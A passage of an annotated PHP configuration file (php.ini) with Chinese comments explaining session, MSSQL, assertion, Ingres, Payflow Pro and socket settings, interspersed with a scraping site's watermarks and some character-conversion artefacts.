; 設(shè)為{nocache,private,public},以決定 HTTP 的　 緩存問題　session.cache_expire = 180 ; 文檔在 n 分鐘后過時　session.use_trans_sid = 1 ; 使用過渡性的 sid 支持，若編譯時許可了　 --enable-trans-sid　url_rewriter.tags = 'a=href,area=href,frame=src,input=src,form=fakeentry'　

[MSSQL]　extension=php_mssql.dll　mssql.allow_persistent = On ; 允許或禁止 持久連接　mssql.max_persistent = -1 ; 持久連接的最大數(shù).-1 代表無限制　mssql.max_links = -1 ; 連接的最大數(shù)目（持久和非持久）.-1 代表無限制　 網(wǎng)管u家u.bitsCN.commssql.min_error_severity = 10 ; 顯示的錯誤的最低嚴(yán)重性　mssql.min_message_severity = 10 ; 顯示的消息的最低重要性　mssql.compatability_mode = Off ; 與舊版的PHP 3.0 兼容的模式.　

[Assertion]　 ？？？？？　assert.active = On ; ？assert(expr); active by default　assert.warning = On ; issue a PHP warning for each failed assertion.　assert.bail = Off ; don't bail out by default.　assert.callback = 0 ; user-function to be called if an assertion fails.　assert.quiet_eval = 0 ; eval the expression with current error_reporting(). set to true if you want error_reporting(0) around the eval().　

[Ingres II]　ii.allow_persistent = On ; 允許或禁止 持久連接　ii.max_persistent = -1 ; 持久連接的最大數(shù).-1 代表無限制　ii.max_links = -1 ; 連接的最大數(shù)目（持久和非持久）.-1 代表無限制　ii.default_database = ; 默認(rèn) database (format : [node_id::]dbname[/srv_class]　ii.default_user = ; 默認(rèn) user　ii.default_password = ; 默認(rèn) password　 網(wǎng)管下載dl.bitscn.com

[Verisign Payflow Pro]　pfpro.defaulthost = 'test.signio.com' ; 默認(rèn)的 Signio 服務(wù)器　pfpro.defaultport = 443 ; 連接的默認(rèn)端口　pfpro.defaulttimeout = 30 ; 按秒計的默認(rèn)超時時間　

pfpro.proxyaddress = ; 默認(rèn)的代理的 IP 地址（如果需要）　 pfpro.proxyport = ; 默認(rèn)的代理的端口　 pfpro.proxylogon = ; 默認(rèn)的代理的登錄（logon 用戶名）　 pfpro.proxypassword = ; 默認(rèn)的代理的密碼　

[Sockets]　sockets.use_system_read = On ; 使用系統(tǒng)的read() 函數(shù)替代 php_read()封裝　 Local Variables: （局部變量）　 tab-width: 4　 End: